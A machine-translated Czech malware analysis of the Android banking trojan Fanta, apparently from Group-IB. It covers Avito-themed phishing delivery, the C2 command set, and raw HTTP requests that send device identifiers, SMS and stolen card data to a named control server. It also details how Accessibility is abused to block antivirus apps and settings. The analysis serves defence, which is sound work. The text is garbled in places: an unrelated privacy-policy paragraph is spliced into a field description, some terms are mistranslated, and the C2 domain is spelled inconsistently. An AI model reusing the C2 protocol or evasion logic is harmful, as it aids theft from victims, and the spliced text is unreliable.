🥇Leisya, Fanta: nová taktika starého Android Trojan

Jednoho dne budete chtít něco prodat na Avito a po zveřejnění podrobného popisu vašeho produktu (například modulu RAM) obdržíte tuto zprávu:

Jakmile odkaz otevřete, uvidíte zdánlivě neškodnou stránku, která vás, šťastného a úspěšného prodejce, upozorní, že byl proveden nákup:

Po kliknutí na tlačítko „Pokračovat“ se do vašeho zařízení Android stáhne soubor APK s ikonou a názvem vzbuzujícím důvěru. Nainstalovali jste aplikaci, která z nějakého důvodu požadovala práva AccessibilityService, pak se objevilo několik oken a rychle zmizelo a... To je vše.

Jdete zkontrolovat svůj zůstatek, ale z nějakého důvodu vás vaše bankovní aplikace znovu požádá o údaje o vaší kartě. Po zadání údajů se stane něco hrozného: z nějakého důvodu, který vám stále není jasný, začnou z vašeho účtu mizet peníze. Pokoušíte se vyřešit problém, ale váš telefon odolává: stiskne tlačítka „Zpět“ a „Domů“, nevypne se a nedovolí vám aktivovat žádná bezpečnostní opatření. V důsledku toho jste zůstali bez peněz, vaše zboží nebylo zakoupeno, jste zmatení a ptáte se: co se stalo?

Odpověď je jednoduchá: stali jste se obětí trojského koně Android Fanta, člena rodiny Flexnet. Jak se to stalo? Pojďme si to nyní vysvětlit.

Autoři: Andrej Polovinkin, junior specialista na analýzu malwaru, Ivan Pisarev, specialista na analýzu malwaru.

Některé statistiky

Rodina Flexnet trojských koní Android se poprvé stala známou již v roce 2015. Během poměrně dlouhého období činnosti se rodina rozšířila na několik poddruhů: Fanta, Limebot, Lipton atd. Trojan, stejně jako infrastruktura s ním spojená, nestojí na místě: vyvíjejí se nová efektivní distribuční schémata – v našem případě vysoce kvalitní phishingové stránky zaměřené na konkrétního uživatele-prodejce a vývojáři trojských koní sledují módní trendy v zápis virů – přidání nové funkce, která umožňuje efektivněji krást peníze z infikovaných zařízení a obejít ochranné mechanismy.

Kampaň popsaná v tomto článku je zaměřena na uživatele z Ruska, malý počet infikovaných zařízení byl zaznamenán na Ukrajině a ještě méně v Kazachstánu a Bělorusku.

Přestože je Flexnet v aréně trojských koní Android již více než 4 roky a byl podrobně studován mnoha výzkumníky, je stále v dobrém stavu. Od ledna 2019 je potenciální výše škod více než 35 milionů rublů - a to pouze pro kampaně v Rusku. V roce 2015 se různé verze tohoto trojského Androida prodávaly na podzemních fórech, kde se dal najít i zdrojový kód trojského koně s podrobným popisem. To znamená, že statistiky škod ve světě jsou ještě působivější. To není špatný ukazatel pro tak starého muže, že?

Od prodeje k podvodu

Jak je patrné z dříve prezentovaného snímku phishingové stránky internetové služby Avito pro zveřejňování reklam, byla připravena pro konkrétní oběť. Útočníci podle všeho používají jeden z analyzátorů Avito, který extrahuje telefonní číslo a jméno prodejce a také popis produktu. Po rozbalení stránky a přípravě APK souboru je oběti zaslána SMS s jeho jménem a odkazem na phishingovou stránku s popisem jeho produktu a částkou obdrženou z „prodeje“ produktu. Kliknutím na tlačítko uživatel obdrží škodlivý APK soubor - Fanta.

Studie domény shcet491[.]ru ukázala, že je delegována na servery DNS společnosti Hostinger:

ns1.hostinger.ru
ns2.hostinger.ru
ns3.hostinger.ru
ns4.hostinger.ru

Soubor zóny domény obsahuje položky odkazující na adresy IP 31.220.23[.]236, 31.220.23[.]243 a 31.220.23[.]235. Záznam primárního prostředku domény (záznam A) však odkazuje na server s adresou IP 178.132.1[.]240.

IP adresa 178.132.1[.]240 se nachází v Nizozemsku a patří hostiteli WorldStream. IP adresy 31.220.23[.]235, 31.220.23[.]236 a 31.220.23[.]243 se nacházejí ve Velké Británii a patří sdílenému hostingovému serveru HOSTINGER. Používá se jako záznamník openprov-ru. Následující domény byly také přeloženy na IP adresu 178.132.1[.]240:

sdelka-ru[.]ru
tovar-av[.]ru
av-tovar[.]ru
ru-sdelka[.]ru
shcet382[.]ru
sdelka221[.]ru
sdelka211[.]ru
vyplata437[.]ru
viplata291[.]ru
perevod273[.]ru
perevod901[.]ru

Je třeba poznamenat, že odkazy v následujícím formátu byly dostupné téměř ze všech domén:

http://(www.){0,1}<%domain%>/[0-9]{7}

Tato šablona také obsahuje odkaz ze zprávy SMS. Na základě historických údajů bylo zjištěno, že jedna doména odpovídá několika odkazům ve výše popsaném vzoru, což naznačuje, že jedna doména byla použita k distribuci trojského koně několika obětem.

Trochu předskočíme: Trojan stažený prostřednictvím odkazu z SMS používá adresu jako řídicí server onusedseddohap[.]klub. Tato doména byla zaregistrována 2019-03-12 a od 2019-04-29 s touto doménou interagovaly aplikace APK. Na základě údajů získaných z VirusTotal s tímto serverem interagovalo celkem 109 aplikací. Samotná doména se přeložila na IP adresu 217.23.14[.]27, která se nachází v Nizozemsku a je ve vlastnictví hostitele WorldStream. Používá se jako záznamník namecheap. Domény jsou také přeloženy na tuto IP adresu bad-racoon[.]klub (od 2018) a bad-racoon[.]živě (od 2018). S doménou bad-racoon[.]klub interagovalo s více než 80 soubory APK bad-racoon[.]živě - více než 100.

Obecně útok probíhá následovně:

Co je pod pokličkou Fanty?

Stejně jako mnoho jiných trojských koní Android je Fanta schopna číst a odesílat SMS zprávy, provádět požadavky USSD a zobrazovat vlastní okna nad aplikacemi (včetně bankovních). Arzenál funkčnosti této rodiny však dorazil: Fanta začala používat AccessibilityService pro různé účely: čtení obsahu oznámení z jiných aplikací, zabránění odhalení a zastavení spouštění trojského koně na infikovaném zařízení atd. Fanta funguje na všech verzích Androidu, které nejsou mladší než 4.4. V tomto článku se blíže podíváme na následující Fanta vzorek:

MD5: 0826bd11b2c130c4c8ac137e395ac2d4
SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Ihned po spuštění

Ihned po spuštění trojský kůň skryje svou ikonu. Aplikace může fungovat pouze v případě, že název infikovaného zařízení není v seznamu:

android_x86
VirtualBox
Nexus 5X (hlava)
Nexus 5 (holicí strojek)

Tato kontrola se provádí v hlavní službě Trojan - MainService. Při prvním spuštění jsou konfigurační parametry aplikace inicializovány na výchozí hodnoty (formát pro ukládání konfiguračních dat a jejich význam bude diskutován později) a na řídicí server je zaregistrováno nové infikované zařízení. Na server bude odeslán požadavek HTTP POST s typem zprávy register_bot a informace o infikovaném zařízení (verze Androidu, IMEI, telefonní číslo, jméno operátora a kód země, ve které je operátor registrován). Adresa slouží jako řídicí server hXXp://onuseddohap[.]klub/controller.php. Jako odpověď server odešle zprávu obsahující pole bot_id, bot_pwd, Server — aplikace uloží tyto hodnoty jako parametry CnC serveru. Parametr Server volitelné, pokud pole nebylo přijato: Fanta používá registrační adresu - hXXp://onuseddohap[.]klub/controller.php. Pomocí funkce změny adresy CnC lze vyřešit dva problémy: rovnoměrné rozložení zátěže mezi několik serverů (při velkém počtu infikovaných zařízení může být zatížení neoptimalizovaného webového serveru vysoké) a také použití alternativní server v případě výpadku jednoho z CNC serverů.

Pokud při odesílání požadavku dojde k chybě, trojský kůň zopakuje proces registrace po 20 sekundách.

Jakmile bude zařízení úspěšně zaregistrováno, Fanta zobrazí uživateli následující zprávu:

Důležitá poznámka: volaná služba Zabezpečení systému — název trojské služby a po kliknutí na tlačítko OK Otevře se okno s nastavením Usnadnění infikovaného zařízení, kde musí uživatel udělit práva Přístupnost pro škodlivou službu:

Jakmile se uživatel zapne AccessibilityService, Fanta získá přístup k obsahu oken aplikace a akcím v nich prováděným:

Ihned poté, co trojský kůň obdrží práva přístupnosti, požádá o administrátorská práva a práva ke čtení oznámení:

Pomocí AccessibilityService aplikace simuluje stisky kláves, čímž si uděluje všechna potřebná práva.

Fanta vytváří několik databázových instancí (které budou popsány později) nezbytných pro uložení konfiguračních dat a také informací shromážděných v procesu o infikovaném zařízení. K odeslání shromážděných informací vytvoří trojský kůň opakující se úlohu určenou ke stažení polí z databáze a přijetí příkazu z řídicího serveru. Interval přístupu k CnC je nastaven v závislosti na verzi Androidu: v případě 5.1 bude interval 10 sekund, jinak 60 sekund.

Aby Fanta příkaz obdržel, požádá GetTask na server pro správu. Jako odpověď může CnC odeslat jeden z následujících příkazů:

Tým	popis
0	Odeslat SMS zprávu
1	Uskutečněte telefonní hovor nebo příkaz USSD
2	Aktualizuje parametr interval
3	Aktualizuje parametr zachytit
6	Aktualizuje parametr smsManager
9	Začněte sbírat SMS zprávy
11	Resetujte telefon do továrního nastavení
12	Povolit/zakázat protokolování vytvoření dialogového okna

Fanta také sbírá upozornění ze 70 bankovních aplikací, rychlých platebních systémů a elektronických peněženek a ukládá je do databáze.

Ukládání konfiguračních parametrů

K ukládání konfiguračních parametrů používá Fanta standardní přístup pro platformu Android - Nastavení-soubory. Nastavení se uloží do souboru s názvem Nastavení. Popis uložených parametrů je v tabulce níže.

název	Výchozí hodnota	Možné hodnoty	popis
id	0	Celé číslo	ID robota
Server	hXXp://onuseddohap[.]klub/	URL	Adresa řídicího serveru
pwd	-	Řetězec	Heslo serveru
interval	20	Celé číslo	Časový interval. Označuje, jak dlouho by měly být odloženy následující úkoly: Při odesílání dotazu na stav odeslané SMS zprávy Příjem nového příkazu ze serveru pro správu
zachytit	všechno	vše/telNumber	Pokud se pole rovná řetězci všechno nebo telNumber, pak bude přijatá SMS zpráva zachycena aplikací a nebude zobrazena uživateli
smsManager	0	0/1	Povolit/zakázat aplikaci jako výchozího příjemce SMS
readDialog	nepravdivý	Pravda/nepravda	Povolit/zakázat protokolování událostí AccessibilityEvent

Fanta také používá soubor smsManager:

název	Výchozí hodnota	Možné hodnoty	popis
pckg	-	Řetězec	Název použitého správce SMS zpráv

Interakce s databázemi

Trojan během své činnosti využívá dvě databáze. Databáze pojmenovaná a slouží k ukládání různých informací shromážděných z telefonu. Druhá databáze se jmenuje fanta.db a používá se k uložení nastavení odpovědných za vytváření phishingových oken určených ke shromažďování informací o bankovních kartách.

Trojan používá databázi а k ukládání shromážděných informací a protokolování vašich akcí. Data jsou uložena v tabulce protokoly. Chcete-li vytvořit tabulku, použijte následující dotaz SQL:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Databáze obsahuje následující informace:

1. Protokolování spuštění infikovaného zařízení pomocí zprávy Telefon se zapnul!

2. Upozornění z aplikací. Zpráva je generována podle následující šablony:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Údaje o bankovní kartě z phishingových formulářů vytvořených trojským koněm. Parametr VIEW_NAME může být jedna z následujících:

AliExpress
Avito
Google Play
Různé <%App Name%>

Zpráva je zaznamenána ve formátu:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Příchozí/odchozí SMS zprávy ve formátu:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Informace o balíčku, který vytváří dialogové okno, ve formátu:

(<%Package name%>)<%Package information%>

Příklad tabulky protokoly:

Jednou z funkcí Fanta je shromažďování informací o bankovních kartách. Sběr dat probíhá prostřednictvím vytváření phishingových oken při otevírání bankovních aplikací. Trojský kůň vytvoří phishingové okno pouze jednou. Informace, že se okno uživateli zobrazilo, je uložena v tabulce Nastavení v databázi fanta.db. K vytvoření databáze použijte následující SQL dotaz:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Všechna pole tabulky Nastavení ve výchozím nastavení inicializováno na 1 (vytvořit phishingové okno). Poté, co uživatel zadá svá data, bude hodnota nastavena na 0. Příklad polí tabulky Nastavení:

can_login — pole odpovídá za zobrazení formuláře při otevírání bankovní aplikace
první_banka - nepoužívá
can_avito — pole je zodpovědné za zobrazení formuláře při otevření aplikace Avito
can_ali — pole je zodpovědné za zobrazení formuláře při otevření aplikace Aliexpress
může_jiný — pole odpovídá za zobrazení formuláře při otevření jakékoli aplikace ze seznamu: Yula, Pandao, Drom Auto, Peněženka. Slevové a bonusové karty, Aviasales, Booking, Trivago
can_card — pole je zodpovědné za zobrazení formuláře při otevírání Google Play

Interakce se serverem pro správu

Síťová interakce se serverem pro správu probíhá prostřednictvím protokolu HTTP. Pro práci se sítí Fanta využívá oblíbenou knihovnu Retrofit. Žádosti se zasílají na adresu: hXXp://onuseddohap[.]klub/controller.php. Adresu serveru lze změnit při registraci na serveru. Jako odpověď ze serveru mohou být odesílány soubory cookie. Fanta odesílá na server následující požadavky:

Registrace robota na řídicím serveru probíhá jednou, při prvním spuštění. Na server jsou odeslány následující údaje o infikovaném zařízení:
· sušenka — soubory cookie přijaté ze serveru (výchozí hodnota je prázdný řetězec)
· způsob — strunová konstanta register_bot
· prefix — celočíselná konstanta 2
· version_sdk — se tvoří podle následující šablony: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· imei — IMEI infikovaného zařízení
· země — kód země, ve které je provozovatel registrován, ve formátu ISO
· číslo - telefonní číslo
· provozovatel — jméno operátora

Příklad požadavku odeslaného na server:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>
```
V reakci na požadavek musí server vrátit objekt JSON obsahující následující parametry:
· bot_id — ID infikovaného zařízení. Pokud je bot_id rovno 0, Fanta požadavek znovu provede.
bot_pwd — heslo pro server.
server — adresa řídicího serveru. Volitelný parametr. Pokud parametr není uveden, použije se adresa uložená v aplikaci.

Příklad objektu JSON:
```
{
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}
```

Žádost o přijetí příkazu ze serveru. Na server jsou odesílány následující údaje:
· sušenka — soubory cookie přijaté ze serveru
· nabídka — ID infikovaného zařízení, které bylo přijato při odesílání požadavku register_bot
· pwd -heslo k serveru
· divice_admin — pole určuje, zda byla získána administrátorská práva. Pokud jste získali práva správce, pole se rovná 1, v opačném případě 0
· Přístupnost — Stav provozu služby usnadnění. Pokud byla služba spuštěna, hodnota je 1, v opačném případě 0
· SMSManager — zobrazuje, zda je trojský kůň povolen jako výchozí aplikace pro příjem SMS
· obrazovka — zobrazuje, v jakém stavu je obrazovka. Hodnota bude nastavena 1, pokud je obrazovka zapnutá, jinak 0;

Příklad požadavku odeslaného na server:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>
```
V závislosti na příkazu může server vrátit objekt JSON s různými parametry:

· Tým Odeslat SMS zprávu: Parametry obsahují telefonní číslo, text SMS zprávy a ID odesílané zprávy. Identifikátor se používá při odesílání zprávy na server s typem setSmsStatus.
```
{
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}
```
· Tým Uskutečněte telefonní hovor nebo příkaz USSD: Telefonní číslo nebo příkaz jsou uvedeny v těle odpovědi.
```
{
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}
```
· Tým Změna parametru intervalu.
```
{
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}
```
· Tým Změňte parametr zachycení.
```
{
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}
```
· Tým Změňte pole SmsManager.
```
{
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```
· Tým Sbírejte SMS zprávy z infikovaného zařízení.
```
{
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}
```
· Tým Resetujte telefon do továrního nastavení:
```
{
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}
```
· Tým Změňte parametr ReadDialog.
```
{
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}
```

Odeslání zprávy s typem setSmsStatus. Tento požadavek je proveden po provedení příkazu Odeslat SMS zprávu. Žádost vypadá takto:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

Nahrávání obsahu databáze. Na jeden požadavek se přenáší jeden řádek. Na server jsou odesílány následující údaje:
· sušenka — soubory cookie přijaté ze serveru
· způsob — strunová konstanta setSaveInboxSms
· nabídka — ID infikovaného zařízení, které bylo přijato při odesílání požadavku register_bot
· (souhrnně „Stránka (Stránky)“), a naše postupy pro shromažďování, využívání, uchovávání, ochranu a zpřístupnění takových informací. Tyto zásady platí pro informace, které shromažďujeme na těchto stránkách nebo v e-mailu, textových a jiných elektronických zprávách mezi vámi a těmito stránkami. Rovněž popisují vaše možnosti týkající se využívání vašich osobních údajů, přístupu k nim a jejich opravě. — text v aktuálním záznamu databáze (pole d od stolu protokoly v databázi а)
· číslo — název aktuálního databázového záznamu (pole p od stolu protokoly v databázi а)
· sms_mode — celočíselná hodnota (pole m od stolu protokoly v databázi а)

Žádost vypadá takto:
```
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>
```
V případě úspěšného odeslání na server bude řádek smazán z tabulky. Příklad objektu JSON vráceného serverem:
```
{
    "response":[],
    "status":"ok"
}
```

Interakce se službou AccessibilityService

Služba AccessibilityService byla implementována s cílem usnadnit používání zařízení Android pro lidi s postižením. Ve většině případů je k interakci s aplikací nutná fyzická interakce. AccessibilityService vám umožňuje provádět je programově. Fanta pomocí služby vytváří falešná okna v bankovních aplikacích a brání uživatelům v otevírání systémových nastavení a některých aplikací.

Pomocí funkce AccessibilityService trojský kůň sleduje změny prvků na obrazovce infikovaného zařízení. Jak bylo popsáno dříve, nastavení Fanta obsahuje parametr zodpovědný za protokolování operací s dialogovými okny - readDialog. Pokud je tento parametr nastaven, budou do databáze přidány informace o názvu a popisu balíčku, který událost spustil. Trojský kůň při spuštění události provede následující akce:

Simuluje stisknutí kláves Zpět a Domů v následujících případech:
· pokud chce uživatel restartovat své zařízení
· pokud chce uživatel smazat aplikaci „Avito“ nebo změnit přístupová práva
· pokud je na stránce zmínka o aplikaci „Avito“.
· při otevření aplikace Google Play Protect
· při otevírání stránek s nastavením AccessibilityService
· když se zobrazí dialogové okno Zabezpečení systému
· při otevření stránky s nastavením „Nakreslit přes jinou aplikaci“.
· při otevření stránky „Aplikace“, „Obnova a reset“, „Obnovení dat“, „Obnovení nastavení“, „Panel pro vývojáře“, „Speciální. příležitosti“, „Speciální příležitosti“, „Zvláštní práva“
· pokud událost vygenerovaly určité aplikace.

Seznam aplikací
- robot
- Master Lite
- Clean Master
- Clean Master pro x86 CPU
- Správa oprávnění aplikací Meizu
- Zabezpečení MIUI
- Clean Master – Antivirus a čistič mezipaměti a odpadků
- Rodičovská kontrola a GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus a bezplatná ochrana 2019
- Mobilní zabezpečení MegaFon
- AVG Protection pro Xperia
- Mobilní zabezpečení
- Antivirus a ochrana Malwarebytes
- Antivirus pro android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- AVG antivirus pro tablet Huawei System Manager
- Dostupnost Samsung
- Samsung Smart Manager
- Mistře bezpečnosti
- Speed Booster
- Dr.Web
- Dr.Web Security Space
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirové a mobilní zabezpečení
- Kaspersky Internet Security: Antivirus a ochrana
- Životnost baterie Kaspersky: Saver & Booster
- Kaspersky Endpoint Security - ochrana a správa
- AVG Antivirus free 2019 – ochrana pro Android
- antivirus pro Android
- Norton Mobile Security a antivirus
- Antivirus, firewall, VPN, mobilní zabezpečení
- Mobilní zabezpečení: antivirus, VPN, ochrana proti krádeži
- Antivirus pro Android
Pokud je požadováno povolení při odesílání SMS zprávy na krátké číslo, Fanta simuluje kliknutí na zaškrtávací políčko Pamatujte na výběr a tlačítko poslat.
Když se pokusíte odebrat trojskému koni administrátorská práva, uzamkne se obrazovka telefonu.
Zabraňuje přidávání nových administrátorů.
Pokud antivirová aplikace dr.web zjistil hrozbu, Fanta napodobuje stisknutí tlačítka ignorovat.
Trojan simuluje stisknutí tlačítka Zpět a Domů, pokud byla událost vygenerována aplikací Péče o zařízení Samsung.
Fanta vytváří phishingová okna s formuláři pro zadávání informací o bankovních kartách, pokud byla spuštěna aplikace ze seznamu asi 30 různých internetových služeb. Mezi nimi: AliExpress, Booking, Avito, komponenta trhu Google Play, Pandao, Drom Auto atd.

Phishingové formuláře

Fanta analyzuje, které aplikace běží na infikovaném zařízení. Pokud byla otevřena aplikace, která vás zajímá, trojský kůň zobrazí nad všemi ostatními phishingové okno, což je formulář pro zadání informací o bankovní kartě. Uživatel musí zadat následující údaje:
- Číslo karty
- Datum platnosti karty
- CVV
- Jméno držitele karty (neplatí pro všechny banky)
V závislosti na spuštěné aplikaci se zobrazí různá phishingová okna. Níže jsou uvedeny příklady některých z nich:

AliExpress:

Avito:

Pro některé další aplikace, např. Google Play Market, Aviasales, Pandao, Booking, Trivago:

Jak to bylo doopravdy

Naštěstí se z toho, kdo obdržel SMS zprávu popsanou na začátku článku, vyklubal specialista na kybernetickou bezpečnost. Proto se skutečná, nerežisérská verze liší od té, která byla zmíněna dříve: člověk obdržel zajímavou SMS, po které ji dal týmu Group-IB Threat Hunting Intelligence. Výsledkem útoku je tento článek. Šťastný konec, že? Ne všechny příběhy však končí tak úspěšně, a aby ten váš nevypadal jako režisérský sestřih se ztrátou peněz, ve většině případů stačí dodržet tato dlouho popsaná pravidla:
- neinstalujte aplikace pro mobilní zařízení s OS Android z jiných zdrojů než z Google Play
- Při instalaci aplikace věnujte zvláštní pozornost právům požadovaným aplikací
- věnujte pozornost příponám stahovaných souborů
- pravidelně instalujte aktualizace operačního systému Android
- nenavštěvujte podezřelé zdroje a nestahujte odtud soubory
- Neklikejte na odkazy přijaté v SMS zprávách.

Zdroj: www.habr.com

Leysya, Fanta: nová taktika pro starého trojského koně Android